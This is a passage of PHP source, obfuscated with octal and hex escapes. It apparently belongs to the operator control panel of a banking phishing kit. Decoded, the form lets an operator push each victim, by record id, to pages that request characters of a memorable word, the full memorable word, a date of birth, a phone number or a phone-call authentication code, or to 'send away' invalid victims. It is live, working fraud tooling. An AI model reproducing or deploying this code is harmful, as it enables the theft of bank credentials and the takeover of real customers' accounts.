11\11\11\11\74\142\162\x3e\12\x9\x9\11\x9\x9\11\x9\11\74\x2f\x64\151\x76\x3e\12\xa\11\x9\x9\11\x9\x9\11\x9\x3c\x21\x2d\55\40\x45\116\x44\40\x2d\x2d\x3e\12\12\x9\11\11\11\11\11\x9\x9\x3c\x74\x61\x62\154\145\x20\x73\x74\x79\x6c\145\75\x27\x77\x69\x64\x74\150\72\x20\x31\60\x30\x25\73\142\141\143\x6b\147\x72\157\x75\x6e\144\x2d\x63\x6f\x6c\x6f\162\72\x20\x62\x6c\x61\x63\x6b\x3b\x63\157\154\x6f\162\72\x20\167\x68\151\x74\x65\x3b\x70\141\x64\144\x69\156\147\72\40\x31\60\45\73\x27\x3e\12\x9\x9\11\x9\x9\11\11\x9\x9\x3c\164\x62\157\144\171\40\x73\x74\171\x6c\145\x3d\x27\154\x69\156\x65\x2d\x68\x65\151\147\x68\164\x3a\61\x30\x30\45\73\x27\x3e\12\11\11\x9\11\x9\11\x9\11\11\12\x9\x9\x9\11\x9\11\11\x9\11\11\74\164\162\x3e\12\x9\x9\11\11\x9\x9\11\11\x9\x9\x9\74\x74\x64\76\12\11\11\11\x9\x9\11\11\11\x9\11\11\x9\x3c\x64\151\166\x20\143\x6c\x61\163\x73\75\x27\146\157\162\155\55\143\x68\145\x63\x6b\47\76\12\x9\11\11\11\x9\x9\x9\x9\11\x9\11\x9\11\x3c\x6c\141\142\145\154\x20\146\157\162\x3d\47\141\163\153\143\x68\141\x72\x73\x72\141\144\151\157\x30{$value["\x69\x64"]}\47\x20\x63\154\141\x73\163\75\47\x66\x6f\162\155\55\143\x68\x65\143\153\55\x6c\x61\142\145\154\x27\76\12\x9\x9\x9\x9\x9\11\x9\x9\x9\x9\11\11\11\x9\x3c\x69\156\x70\165\164\x20\164\171\x70\145\75\x27\x72\x61\144\x69\157\x27\40\156\141\155\x65\75\x27\163\164\141\x74\165\163\x27\40\166\141\154\x75\x65\x3d\47\61\61\x27\40\x69\144\x3d\x27\x61\x73\x6b\x63\x68\141\x72\x73\162\x61\x64\x69\x6f\60{$value["\x69\x64"]}\x27\40\x6f\x6e\143\154\151\x63\x6b\75\x27\x73\x68\x6f\167\x66\151\x65\154\144\163\x28{$value["\151\144"]}\x29\73\47\40\143\x6c\141\163\x73\75\47\x73\164\141\x74\165\163\40\146\157\162\x6d\55\143\x68\145\143\x6b\55\151\156\x70\165\x74\47\76\xa\11\x9\x9\11\11\x9\11\x9\11\11\x9\11\11\x9\74\163\160\141\156\x3e\x52\145\x71\165\x65\x73\x74\40\115\x65\155\x6f\162\x61\x62\154\145\74\x2f\x73\160\141\156\x3e\12\11\11\x9\11\11\x9\x9\11\x9\x9\11\11\x9\x3c\x2f\x6c\x61\142\145\x6c\76\xa\11\x9\x9\11\x9\11\11\11\11\11\11\11\x3c\x2f\144\151\x76\76\12\11\11\x9\x9\11\x9\x9\11\11\11\x9\11\x3c\x21\x2d\55\40\x49\156\160\165\x74\40\143\x68\141\162\141\x63\x74\x65\x72\163\x20\55\x2d\x3e\12\11\11\x9\x9\x9\x9\11\x9\11\x9\11\x9\x3c\x64\x69\166\40\x63\x6c\141\163\x73\75\x27\x66\157\162\155\x2d\147\162\x6f\x75\160\47\x20\163\164\171\154\145\x3d\47\144\151\163\x70\154\x61\171\72\156\157\x6e\x65\x3b\47\40\x69\144\x3d\x27\141\x73\153\x63\x68\x61\162\x73\60{$value["\151\144"]}\x27\76\12\x9\11\11\x9\x9\x9\11\11\11\11\11\11\x9\74\x64\x69\166\40\x63\154\x61\x73\x73\x3d\x27\x72\x6f\167\x27\40\x73\164\171\154\x65\x3d\47\x6d\141\x72\x67\151\x6e\x2d\154\145\146\x74\x3a\x35\x25\73\155\141\162\x67\151\156\x2d\x74\157\160\x3a\65\160\x78\47\x20\76\12\11\11\11\11\11\x9\11\11\x9\11\x9\11\11\x9\x3c\144\151\166\x20\143\x6c\141\163\x73\x3d\x27\x63\157\x6c\x27\x3e\12\x9\x9\11\x9\11\11\11\x9\x9\x9\11\x9\x9\11\11\74\151\x6e\x70\x75\x74\40\x74\171\x70\145\x3d\x27\164\x65\170\164\47\40\x63\x6c\141\x73\163\x3d\x27\x66\x6f\x72\x6d\55\143\x6f\x6e\164\162\157\154\x27\40\x70\154\x61\143\145\x68\157\x6c\144\x65\162\x3d\x27\105\56\147\40\61\163\164\47\x20\x6e\x61\155\145\75\47\x61\x73\153\143\150\141\162\x31\47\40\151\144\75\47\x61\x73\153\x63\x68\x61\x72\61\47\40\x73\164\171\x6c\x65\x3d\x27\x77\x69\144\164\x68\72\x38\x30\x25\73\142\157\162\144\145\162\x2d\143\x6f\x6c\157\x72\72\43\144\66\144\x36\145\x35\47\76\12\x9\11\11\x9\11\x9\x9\x9\11\x9\11\x9\11\11\x3c\x2f\144\x69\x76\x3e\xa\x9\11\x9\11\11\x9\x9\x9\x9\11\x9\x9\x9\11\74\144\151\166\40\143\x6c\x61\163\x73\75\47\143\157\x6c\47\x3e\12\11\x9\x9\11\11\11\11\11\11\x9\x9\x9\x9\x9\x9\74\151\156\x70\165\164\40\x74\171\x70\x65\75\47\x74\x65\170\x74\47\40\x63\154\141\163\x73\75\x27\x66\x6f\162\155\55\x63\x6f\x6e\x74\x72\157\x6c\x27\40\160\154\x61\143\x65\x68\x6f\154\144\x65\162\75\47\105\56\x67\x20\63\x72\x64\47\x20\x6e\141\155\x65\75\47\141\x73\153\x63\150\x61\x72\62\47\40\151\x64\75\x27\x61\x73\x6b\x63\150\x61\162\62\x27\40\x73\x74\171\154\145\75\x27\x77\x69\x64\x74\150\x3a\x38\x30\x25\x3b\142\x6f\x72\x64\145\162\55\x63\157\x6c\157\x72\x3a\x23\x64\x36\x64\66\145\x35\x27\x3e\xa\x9\x9\11\11\11\x9\x9\x9\x9\x9\x9\x9\11\11\x3c\x2f\x64\151\166\x3e\xa\x9\x9\11\11\x9\x9\11\11\x9\x9\11\x9\x9\x9\x3c\144\151\x76\40\x63\154\141\x73\x73\x3d\47\143\x6f\154\x27\x3e\12\x9\x9\x9\x9\11\11\11\11\x9\11\11\x9\x9\x9\x9\74\x69\x6e\160\x75\164\x20\164\x79\160\x65\x3d\47\164\145\x78\164\47\x20\x63\x6c\x61\x73\x73\75\47\146\x6f\162\x6d\55\143\x6f\156\x74\x72\x6f\154\47\x20\x70\x6c\x61\x63\145\150\157\154\x64\145\162\x3d\47\x45\x2e\x67\x20\66\x74\x68\47\x20\x6e\141\x6d\x65\75\47\141\x73\153\143\150\141\x72\63\47\40\151\144\75\x27\x61\163\153\x63\x68\141\x72\63\x27\x20\163\164\x79\154\x65\75\47\167\151\x64\164\x68\72\x38\x30\x25\x3b\142\157\x72\x64\x65\162\55\143\x6f\154\x6f\x72\72\43\144\x36\144\66\x65\x35\47\76\12\x9\x9\x9\x9\x9\11\11\x9\11\11\x9\11\11\x9\x3c\57\144\x69\x76\x3e\12\x9\11\11\x9\11\11\11\11\x9\11\11\11\x9\74\x2f\144\x69\x76\x3e\12\x9\x9\11\x9\x9\x9\11\x9\x9\11\11\11\74\57\144\151\166\x3e\xa\11\11\11\x9\x9\11\11\11\11\11\11\74\57\x74\x64\76\xa\11\11\11\11\11\11\11\x9\x9\x9\11\74\164\144\x3e\xa\x9\11\x9\11\x9\x9\x9\x9\x9\x9\11\11\74\x64\x69\x76\x20\143\154\141\x73\163\x3d\x27\x66\x6f\x72\155\55\143\150\145\143\x6b\x27\x3e\12\x9\11\11\11\11\x9\x9\x9\x9\11\11\11\x9\x3c\154\x61\142\145\154\x20\146\157\162\75\47\x61\x73\x6b\143\150\141\x72\x73\x72\141\x64\151\157\61{$value["\151\144"]}\47\40\x63\x6c\141\x73\x73\75\47\146\x6f\162\155\55\143\x68\x65\x63\153\55\154\141\x62\x65\x6c\x27\76\xa\x9\11\11\x9\x9\x9\11\11\x9\x9\11\x9\x9\x9\x3c\x69\x6e\160\x75\164\40\x74\171\x70\145\x3d\x27\x72\141\x64\x69\x6f\x27\40\x6e\141\x6d\145\x3d\x27\163\164\141\x74\x75\163\47\40\x76\141\154\165\x65\75\x27\61\62\47\40\151\144\x3d\x27\141\x73\x6b\143\150\141\162\x73\162\141\144\x69\157\x31{$value["\x69\x64"]}\x27\x20\x6f\x6e\143\154\151\143\153\x3d\47\x73\150\157\167\146\x69\145\154\x64\x73\50{$value["\151\144"]}\51\x3b\x27\x20\x63\154\141\163\163\75\x27\163\x74\x61\164\165\x73\40\x66\x6f\162\x6d\55\143\x68\x65\x63\x6b\55\151\x6e\x70\165\x74\47\x3e\12\11\11\11\x9\11\11\11\11\11\x9\x9\11\x9\11\x3c\163\160\141\x6e\76\122\x65\x71\x75\x65\x73\x74\x20\x74\x6f\40\143\x61\x6c\x6c\x20\x3c\57\163\x70\x61\x6e\76\xa\11\x9\11\x9\x9\11\11\11\11\x9\11\11\x9\74\57\x6c\141\142\x65\154\x3e\12\11\11\11\x9\x9\x9\x9\11\x9\11\11\x9\74\57\144\151\x76\x3e\xa\11\11\11\x9\11\11\x9\x9\x9\11\11\x9\x3c\x21\x2d\x2d\x20\x49\156\160\x75\x74\x20\x63\150\141\162\141\143\164\x65\162\163\40\55\55\76\xa\x9\x9\11\11\11\x9\11\x9\x9\11\x9\11\x3c\144\x69\x76\x20\x63\x6c\x61\163\163\75\47\146\x6f\x72\x6d\x2d\147\x72\157\165\160\47\40\163\164\171\154\x65\x3d\47\144\x69\163\x70\154\x61\x79\x3a\156\157\156\145\x3b\x27\40\x69\144\x3d\47\x61\x73\x6b\x63\x68\x61\162\163\61{$value["\151\x64"]}\x27\76\12\x9\x9\x9\x9\x9\11\11\11\11\x9\11\11\x9\74\x64\x69\166\40\143\154\141\x73\x73\75\x27\x72\x6f\167\47\x20\163\164\171\x6c\145\x3d\x27\155\x61\x72\147\151\x6e\x2d\x6c\145\146\x74\72\x35\x25\73\x6d\141\162\147\151\x6e\55\x74\x6f\x70\x3a\x35\160\170\x27\40\76\xa\11\11\x9\x9\11\x9\11\11\11\x9\x9\11\11\x9\74\144\x69\166\40\x63\154\141\163\x73\x3d\x27\x63\157\x6c\x27\x3e\12\11\11\11\x9\x9\x9\11\x9\11\x9\11\x9\11\11\11\74\x69\156\x70\x75\x74\40\164\171\160\145\x3d\47\x74\x65\170\164\47\x20\143\154\x61\163\x73\75\47\146\157\162\155\55\x63\x6f\x6e\164\x72\x6f\154\47\x20\160\x6c\141\x63\145\150\157\x6c\x64\x65\x72\x3d\x27\x65\x2e\147\x20\x30\67\x31\x32\63\64\x38\x39\x33\x32\x32\x27\x20\x6e\x61\x6d\x65\75\x27\x63\x61\154\x6c\156\165\155\47\40\151\x64\75\47\x63\141\x6c\154\156\165\155\x27\40\x73\x74\171\x6c\145\x3d\x27\167\151\x64\164\150\x3a\70\x30\45\73\142\157\162\144\145\162\x2d\143\x6f\154\x6f\x72\x3a\x23\x64\x36\x64\66\x65\65\47\76\12\x9\11\x9\11\11\11\11\11\11\11\x9\11\x9\11\x3c\x2f\144\151\x76\x3e\xa\11\11\x9\x9\11\11\x9\11\11\11\x9\11\x9\x3c\57\x64\151\x76\x3e\xa\x9\x9\11\x9\x9\x9\11\x9\11\x9\11\x9\x3c\x2f\144\x69\x76\76\12\11\x9\11\x9\11\x9\x9\x9\x9\11\x9\x3c\57\x74\144\x3e\12\11\x9\11\x9\11\11\x9\x9\x9\11\74\x2f\x74\162\x3e\xa\11\x9\11\x9\11\11\x9\11\x9\11\12\11\11\11\x9\11\11\11\11\11\x9\x3c\x74\x72\x3e\xa\x9\11\11\11\11\x9\11\11\x9\x9\x9\x3c\x74\x64\x3e\12\11\x9\11\x9\11\x9\x9\11\x9\x9\11\11\x3c\x64\x69\166\x20\143\154\141\163\x73\75\47\x66\157\x72\x6d\x2d\x63\x68\145\x63\153\x27\76\12\x9\11\x9\11\x9\x9\x9\x9\11\x9\x9\x9\11\x3c\x6c\x61\x62\x65\154\x20\x66\157\162\x3d\47\141\x73\x6b\143\150\141\x72\x73\x72\x61\144\x69\x6f\62{$value["\x69\144"]}\47\x20\x63\x6c\x61\x73\x73\x3d\47\146\157\162\155\x2d\143\150\x65\x63\x6b\55\154\x61\142\145\154\47\x3e\xa\x9\x9\11\11\x9\11\x9\11\11\11\11\x9\11\11\x3c\x69\156\160\165\x74\40\x74\x79\x70\x65\x3d\47\x72\141\144\151\157\x27\40\x6e\141\x6d\145\75\x27\163\x74\x61\164\x75\x73\47\x20\x76\141\x6c\165\x65\75\47\61\63\47\x20\151\x64\x3d\x27\x61\163\x6b\x63\x68\141\162\x73\162\x61\x64\151\157\62{$value["\151\144"]}\47\40\157\156\143\154\151\143\153\x3d\47\163\x68\x6f\167\146\x69\145\x6c\144\x73\x28{$value["\x69\x64"]}\x29\73\x27\40\x63\154\x61\x73\x73\x3d\x27\x73\164\141\164\165\163\x20\x66\x6f\x72\x6d\55\143\150\145\143\153\55\151\156\x70\x75\x74\47\76\xa\x9\11\x9\11\11\11\11\11\11\11\11\11\x9\11\x3c\x73\160\x61\x6e\x3e\x50\x68\157\x6e\x65\x20\143\141\154\154\x20\101\165\164\150\x20\x3c\x2f\x73\x70\141\156\76\xa\x9\11\11\x9\x9\11\x9\x9\11\x9\x9\11\x9\74\x2f\x6c\141\142\145\x6c\x3e\xa\11\x9\x9\11\x9\11\x9\11\x9\11\x9\x9\74\57\x64\x69\166\76\12\x9\x9\11\x9\x9\11\11\x9\x9\11\x9\x9\x3c\x21\x2d\55\x20\x49\156\160\165\164\40\143\x68\x61\x72\141\143\164\x65\162\163\x20\55\55\76\xa\11\x9\11\x9\x9\x9\11\x9\11\x9\x9\x9\x3c\144\151\x76\40\143\x6c\x61\163\163\75\x27\x66\x6f\162\x6d\x2d\147\x72\157\165\x70\x27\40\163\164\171\154\145\75\47\x64\x69\163\160\x6c\141\x79\72\156\x6f\x6e\145\x3b\47\40\151\144\75\x27\x61\x73\x6b\x63\x68\x61\162\163\x32{$value["\151\144"]}\x27\76\12\x9\x9\x9\x9\x9\x9\x9\x9\11\x9\x9\11\11\x3c\x64\x69\x76\x20\x63\x6c\141\x73\x73\x3d\x27\x72\x6f\x77\47\x20\163\x74\171\x6c\x65\75\47\x6d\141\162\147\151\156\x2d\x6c\145\146\x74\x3a\65\x25\x3b\155\x61\162\x67\x69\x6e\x2d\164\x6f\x70\72\x35\160\x78\47\40\x3e\xa\x9\11\11\x9\x9\11\11\x9\11\11\11\x9\11\x9\74\144\151\x76\40\143\x6c\x61\163\x73\x3d\x27\143\x6f\x6c\47\76\12\x9\x9\x9\11\x9\x9\x9\x9\11\11\11\x9\x9\x9\11\74\151\x6e\160\x75\x74\x20\x74\171\160\145\75\x27\x74\x65\x78\x74\47\40\x63\154\x61\x73\x73\75\x27\146\157\162\x6d\x2d\x63\x6f\156\x74\x72\x6f\x6c\47\40\160\154\141\x63\145\150\157\154\144\x65\162\x3d\47\105\x6e\x74\145\x72\x20\143\157\144\145\40\x68\145\x72\x65\47\x20\x6e\141\x6d\145\75\x27\143\141\154\x6c\x5f\x63\157\x64\x65\47\40\151\x64\75\x27\x63\x61\154\154\137\x63\x6f\144\145\47\x20\163\x74\x79\154\145\x3d\47\167\151\144\164\150\x3a\70\x30\45\x3b\x62\157\x72\x64\x65\162\55\143\x6f\x6c\x6f\162\72\43\144\66\x64\x36\x65\x35\x27\x3e\xa\11\11\x9\x9\x9\x9\11\x9\x9\11\11\11\x9\x9\x3c\x2f\144\x69\x76\x3e\xa\11\x9\11\x9\x9\11\x9\x9\11\11\x9\11\x9\x3c\57\144\151\x76\76\xa\x9\x9\11\x9\x9\x9\11\11\11\x9\x9\11\74\x2f\144\151\166\76\xa\11\11\11\x9\11\11\11\x9\11\x9\11\x3c\x2f\x74\x64\76\xa\x9\11\x9\11\11\11\11\11\x9\x9\11\74\164\x64\x3e\xa\11\11\x9\11\11\11\x9\x9\x9\x9\11\x9\x3c\x64\151\x76\x20\x63\154\141\163\x73\x3d\x27\146\157\162\x6d\55\x63\x68\x65\x63\x6b\47\x3e\12\x9\x9\x9\x9\11\x9\11\11\11\11\x9\11\x9\x3c\x6c\141\142\145\x6c\40\x66\157\162\x3d\47\x61\163\x6b\143\150\x61\162\x73\x72\x61\x64\x69\157\63{$value["\x69\144"]}\47\x20\143\154\x61\163\163\75\47\146\x6f\x72\x6d\x2d\143\x68\145\143\x6b\55\x6c\141\142\x65\x6c\47\x3e\xa\11\x9\11\11\11\11\x9\11\11\x9\11\x9\11\11\74\151\x6e\x70\165\x74\40\164\x79\160\x65\x3d\x27\x72\x61\x64\151\x6f\x27\x20\156\x61\155\145\x3d\x27\x73\164\x61\164\x75\163\47\x20\166\141\x6c\x75\145\x3d\x27\x31\64\47\40\x69\x64\75\x27\x61\x73\153\143\x68\141\162\x73\x72\141\144\x69\x6f\63{$value["\151\144"]}\x27\40\157\156\x63\154\151\143\x6b\x3d\x27\x73\150\157\167\146\151\145\x6c\144\163\50{$value["\x69\144"]}\x29\73\47\40\x63\154\141\163\x73\75\x27\163\x74\x61\x74\165\x73\x20\x66\x6f\x72\155\x2d\x63\150\145\x63\153\55\x69\156\160\x75\x74\47\x3e\12\11\x9\x9\11\11\x9\11\x9\11\11\11\x9\x9\11\74\x73\160\141\x6e\x3e\x52\x65\161\x75\145\x73\164\x20\x50\150\x6f\x6e\145\x20\x4e\x6f\x2e\74\57\163\160\141\x6e\x3e\xa\x9\x9\11\11\11\11\11\11\11\x9\11\11\11\74\x2f\154\141\x62\145\154\x3e\xa\x9\x9\x9\11\x9\11\11\x9\11\x9\11\11\74\57\x64\x69\x76\x3e\xa\11\x9\x9\x9\x9\11\11\11\x9\11\11\74\57\x74\144\x3e\xa\x9\11\11\11\x9\x9\11\11\11\11\x3c\x2f\x74\x72\76\12\11\11\x9\x9\11\x9\x9\x9\11\11\12\11\x9\11\11\11\x9\11\x9\11\x9\x3c\164\162\76\xa\11\x9\x9\11\x9\x9\x9\x9\11\x9\11\x3c\x74\144\x3e\xa\11\x9\x9\11\x9\11\x9\x9\x9\x9\11\11\74\144\x69\166\40\143\x6c\141\x73\163\75\x27\146\157\162\155\55\x63\150\145\143\153\x27\76\12\11\11\x9\x9\11\11\11\11\11\11\x9\x9\11\x3c\154\x61\x62\145\154\40\x66\x6f\162\75\x27\x61\x73\x6b\x63\x68\141\162\163\x72\x61\144\x69\157\64{$value["\x69\x64"]}\x27\40\x63\x6c\x61\163\x73\75\47\x66\157\162\155\x2d\x63\150\145\x63\x6b\x2d\x6c\141\x62\x65\154\x27\76\xa\x9\11\11\11\x9\x9\x9\x9\11\x9\x9\x9\11\11\x3c\x69\156\160\x75\x74\40\x74\x79\x70\145\x3d\47\x72\x61\x64\x69\x6f\47\x20\x6e\x61\155\145\75\x27\x73\164\141\164\165\163\x27\40\166\141\154\165\145\75\x27\61\65\47\40\151\x64\75\x27\141\x73\x6b\x63\150\x61\162\163\x72\x61\x64\x69\157\64{$value["\151\x64"]}\x27\x20\x6f\156\x63\154\151\x63\153\75\47\x73\150\157\x77\x66\x69\145\x6c\x64\163\x28{$value["\x69\144"]}\x29\x3b\x27\40\x63\x6c\x61\x73\163\x3d\47\163\164\x61\x74\165\163\x20\146\x6f\x72\155\55\143\150\145\143\153\55\151\x6e\x70\165\x74\x27\x3e\12\11\11\x9\11\x9\x9\x9\x9\x9\x9\11\11\11\x9\x3c\163\160\x61\156\76\x52\x65\x71\165\x65\163\164\x20\106\165\x6c\154\40\x4d\145\155\x6f\40\74\x2f\163\x70\x61\156\76\12\x9\x9\11\11\11\x9\x9\x9\11\11\x9\x9\x9\74\57\154\141\142\145\x6c\76\xa\11\11\x9\x9\11\11\11\x9\x9\11\x9\11\74\57\144\x69\166\76\12\x9\x9\x9\x9\x9\x9\11\x9\11\11\11\x3c\57\164\144\x3e\12\11\11\x9\x9\x9\11\x9\x9\11\11\x9\x3c\164\x64\76\xa\x9\11\11\11\x9\x9\11\11\x9\11\x9\11\x3c\144\x69\166\40\x63\154\141\163\163\x3d\x27\x66\x6f\162\155\55\x63\150\x65\143\x6b\47\x3e\xa\x9\x9\11\x9\x9\x9\x9\11\11\11\11\x9\11\x3c\154\141\142\145\154\40\x66\x6f\162\x3d\47\141\x73\153\x63\x68\141\162\x73\x72\x61\144\151\157\x35{$value["\x69\144"]}\x27\40\x63\x6c\141\163\x73\x3d\47\146\x6f\x72\155\55\143\150\x65\143\x6b\x2d\154\141\142\x65\154\x27\76\xa\11\11\11\x9\x9\x9\11\x9\11\11\11\11\x9\11\74\x69\156\160\165\x74\x20\x74\x79\x70\x65\x3d\x27\162\x61\x64\x69\157\x27\40\156\x61\x6d\145\75\47\x73\x74\141\x74\165\163\47\x20\x76\x61\154\x75\145\75\x27\61\66\x27\40\x69\x64\75\x27\141\163\153\143\150\141\162\x73\x72\x61\144\151\157\x35{$value["\151\x64"]}\47\x20\157\156\143\x6c\151\x63\x6b\x3d\47\x73\150\x6f\x77\x66\151\145\154\144\163\50{$value["\x69\x64"]}\51\73\47\40\143\154\141\x73\x73\x3d\x27\x73\x74\141\164\x75\163\40\x66\157\x72\155\55\143\x68\x65\x63\153\x2d\151\156\160\165\164\47\x3e\12\x9\11\x9\x9\x9\x9\11\x9\x9\x9\x9\x9\x9\11\74\163\x70\141\156\76\x52\x65\x71\x75\145\x73\164\x20\x44\x4f\x42\x20\x3c\x2f\x73\x70\141\x6e\x3e\12\11\x9\11\11\x9\11\x9\x9\11\11\x9\x9\11\x3c\57\x6c\141\x62\x65\154\x3e\xa\x9\x9\11\11\11\x9\11\11\11\11\11\x9\x3c\x2f\x64\x69\166\x3e\xa\11\11\x9\x9\11\11\11\x9\x9\x9\x9\74\x2f\x74\x64\x3e\12\11\x9\x9\x9\x9\x9\11\x9\11\x9\x3c\57\164\162\x3e\12\11\x9\x9\11\11\11\x9\x9\11\11\xa\x9\11\x9\x9\x9\11\11\x9\x9\11\x3c\x74\x72\x3e\12\11\x9\x9\x9\x9\11\x9\x9\11\11\11\x3c\164\x64\x3e\12\11\11\11\11\x9\11\x9\11\x9\11\11\11\x3c\144\x69\166\40\x63\x6c\141\163\x73\75\47\x66\x6f\162\155\x2d\143\x68\x65\x63\153\x27\76\12\x9\x9\11\11\11\11\x9\11\11\11\11\11\11\x3c\x6c\x61\142\145\154\x20\146\157\162\x3d\47\x61\x73\x6b\154\x6f\147\x69\156\162\141\x64\151\157{$value["\151\x64"]}\47\40\143\154\141\163\163\75\x27\146\x6f\x72\155\x2d\143\x68\145\x63\153\55\154\x61\x62\x65\x6c\x27\x3e\12\11\x9\11\x9\11\11\11\11\x9\x9\x9\11\11\x9\x3c\x69\156\x70\x75\164\x20\x74\x79\160\x65\75\x27\162\x61\x64\x69\x6f\47\40\x6e\x61\x6d\x65\x3d\x27\x73\164\x61\164\x75\x73\47\40\x76\141\x6c\165\145\x3d\x27\65\60\x27\40\151\144\x3d\x27\x61\x73\x6b\154\157\x67\151\x6e\x72\141\144\151\x6f{$value["\151\144"]}\x27\40\157\x6e\143\154\x69\143\153\x3d\47\x73\x68\x6f\x77\x66\151\x65\x6c\x64\x73\x28{$value["\x69\144"]}\51\73\47\x20\x63\x6c\x61\163\x73\75\47\x73\164\x61\164\x75\163\x20\146\x6f\162\155\55\x63\150\x65\143\153\55\x69\x6e\160\x75\x74\x27\76\12\x9\x9\11\x9\11\x9\11\x9\11\11\x9\x9\11\x9\74\163\160\x61\x6e\x3e\122\x65\161\165\145\163\164\40\x6c\x6f\147\151\156\40\x61\147\x61\151\156\40\74\x2f\163\160\x61\156\x3e\12\11\11\x9\x9\x9\11\x9\11\x9\11\11\x9\11\74\x2f\154\141\142\x65\x6c\76\xa\11\x9\11\11\x9\x9\11\11\x9\11\11\x9\x3c\57\x64\151\166\x3e\12\x9\x9\x9\11\x9\11\11\11\11\11\x9\x3c\x2f\x74\x64\76\xa\11\x9\x9\x9\x9\11\11\x9\11\11\11\x3c\164\x64\x3e\xa\x9\x9\x9\11\x9\11\x9\11\x9\11\11\x9\74\x64\x69\x76\x20\143\154\x61\x73\163\x3d\47\146\157\x72\x6d\55\x63\150\145\143\x6b\47\76\12\11\x9\x9\x9\x9\11\11\x9\x9\11\x9\x9\11\74\x6c\x61\x62\x65\x6c\40\x66\x6f\x72\75\x27\146\151\x6e\x69\163\150\162\141\x64\151\x6f{$value["\151\x64"]}\x27\x20\143\154\141\163\x73\x3d\47\x66\157\162\155\x2d\x63\x68\145\143\153\55\x6c\141\x62\x65\154\47\76\12\11\11\x9\11\x9\x9\x9\x9\11\11\x9\11\x9\x9\74\151\156\x70\x75\x74\40\164\171\x70\x65\x3d\47\162\141\144\151\x6f\x27\40\156\x61\x6d\x65\75\x27\163\164\x61\164\165\x73\x27\x20\166\141\x6c\x75\145\x3d\x27\62\60\47\x20\151\x64\x3d\47\x66\151\x6e\151\163\x68\162\141\x64\x69\157{$value["\x69\x64"]}\47\40\x6f\156\143\154\151\143\x6b\75\47\x73\x68\x6f\x77\146\151\x65\x6c\144\x73\50{$value["\x69\x64"]}\51\x3b\x27\40\143\x6c\141\163\x73\x3d\x27\x73\x74\x61\x74\x75\163\40\x66\157\x72\155\55\143\150\x65\143\x6b\x2d\x69\x6e\160\x75\x74\x27\76\12\x9\11\11\x9\11\x9\x9\11\x9\11\x9\11\x9\11\74\163\x70\x61\x6e\x3e\106\151\156\x69\x73\x68\74\57\163\160\x61\x6e\x3e\xa\x9\x9\x9\11\11\x9\11\x9\11\11\x9\x9\11\74\57\x6c\x61\x62\145\154\76\xa\x9\11\11\x9\x9\x9\x9\x9\11\11\x9\x9\x3c\57\x64\x69\x76\x3e\xa\11\x9\x9\11\11\x9\11\11\11\11\x9\x3c\57\164\x64\x3e\12\11\11\11\11\11\x9\11\x9\11\11\74\57\164\x72\x3e\xa\11\11\11\11\x9\x9\11\x9\x9\x9\xa\x9\x9\x9\x9\x9\x9\11\x9\11\x9\x3c\164\162\76\xa\x9\x9\11\11\11\11\11\11\x9\x9\11\74\x74\144\x3e\12\x9\11\x9\x9\x9\x9\11\11\x9\x9\x9\x9\74\144\x69\166\40\143\x6c\141\x73\163\x3d\47\146\x6f\x72\x6d\x2d\x63\150\145\143\x6b\47\x3e\12\x9\x9\x9\11\11\11\x9\x9\11\11\x9\x9\11\x3c\x6c\141\x62\x65\x6c\40\x66\x6f\162\75\47\x73\145\156\x64\x61\x77\141\171\162\141\x64\151\x6f{$value["\x69\x64"]}\47\40\143\154\x61\163\163\x3d\47\146\x6f\162\155\55\x63\150\145\x63\x6b\x2d\x6c\x61\x62\x65\x6c\47\76\xa\x9\11\11\x9\11\11\11\11\x9\x9\11\11\x9\11\x3c\151\156\160\x75\164\40\164\171\x70\x65\x3d\47\x72\141\x64\x69\157\x27\40\x6e\141\155\x65\75\47\x73\x74\x61\164\x75\163\47\x20\x76\141\154\x75\145\75\47\61\60\60\47\40\151\x64\75\47\x73\145\x6e\x64\x61\167\x61\171\162\x61\x64\x69\157{$value["\x69\x64"]}\x27\x20\x6f\x6e\x63\x6c\151\143\x6b\75\x27\x73\x68\x6f\x77\x66\x69\145\x6c\144\163\x28{$value["\151\x64"]}\x29\73\x27\x20\143\154\x61\163\163\75\x27\163\x74\141\164\x75\x73\40\146\x6f\162\x6d\55\x63\x68\145\x63\x6b\55\x69\156\x70\x75\164\x27\x3e\xa\x9\x9\11\x9\x9\x9\11\x9\11\11\x9\11\11\x9\x3c\x73\x70\141\156\76\x49\x6e\x76\141\154\x69\144\54\x20\x53\145\156\144\40\141\x77\141\171\x3c\x2f\163\160\141\x6e\76\12\x9\x9\11\11\x9\x9\11\x9\11\11\11\x9\x9\74\x2f\154\x61\142\145\x6c\76\12\x9\11\x9\11\11\x9\x9\x9\x9\x9\x9\x9\x3c\57\x64\x69\166\x3e\12\11\x9\x9\11\x9\11\x9\x9\x9\x9\11\74\x2f\164\x64\76\xa\11\x9\x9\11\11\x9\x9\x9\11\11\x3c\57\164\162\76\xa\xa\11\x9\11\x9\11\11\x9\11\11\x3c\x2f\x74\142\157\144\x79\76\xa\x9\11\11\x9\11\x9\11\11\x3c\x2f\x74\141\142\x6c\x65\76\12\11\x9\11\x9\x9\11\x9\74\57\144\x69\x76\x3e\xa\x9\11\x9\x9\11\11\x9\x3c\x21\55\55\40\105\x6e\x64\x20\x63\x6f\155\x6d\x61\x6e\x64\163\x20\145\x64\151\164\x20\55\55\76\xa\11\x9\x9\x9\x9\11\x9\x3c\x64\x69\x76\40\x63\154\141\163\x73\x3d\47\155\x6f\144\x61\x6c\x2d\146\157\x6f\164\145\x72\47\x20\x73\x74\x79\x6c\x65\x3d\47\x6d\141\162\147\x69\x6e\55\x74\x6f\x70\72\55\x34\x30\160\x78\x27\76\xa\11\11\11\x9\11\11\11\11\x3c\x62\x75\164\x74\157\156\x20\x74\x79\x70\145\x3d\x27\142\x75\x74\x74\157\156\47\40\143\x6c\x61\163\163\x3d\x27\142\164\x6e\x20\x62\x74\156\55\x73\x65\143\x6f\156\144\141\x72\x79\x27\40\157\156\143\154\151\143\153\75\47\143\154\157\163\x65\137\142\164\156\x28\x29\x27\x20\x3e\x43\154\x6f\163\x65\74\x2f\x62\165\164\x74\157\x6e\76\12\x9\x9\11\x9\x9\11\x9\11\x3c\x62\165\x74\164\x6f\x6e\x20\151\x64\x3d\47\x73\x61\166\x65\x5f{$value["\151\x64"]}\47\40\157\x6e\x63\x6c\151\143\x6b\75\x27\146\x6f\162\155\137\163\165\x62\x6d\x69\x74\x28\164\150\x69\163\x29\47\40\x74\171\x70\x65\75\x27\x62\x75\164\x74\157\156\47\40\x63\154\141\x73\x73\x3d\x27\x62\x74\x6e\40\x62\x74\156\x2d\x70\162\x69\155\x61\162\x79\47\76\123\141\x76\145\74\x2f\142\165\164\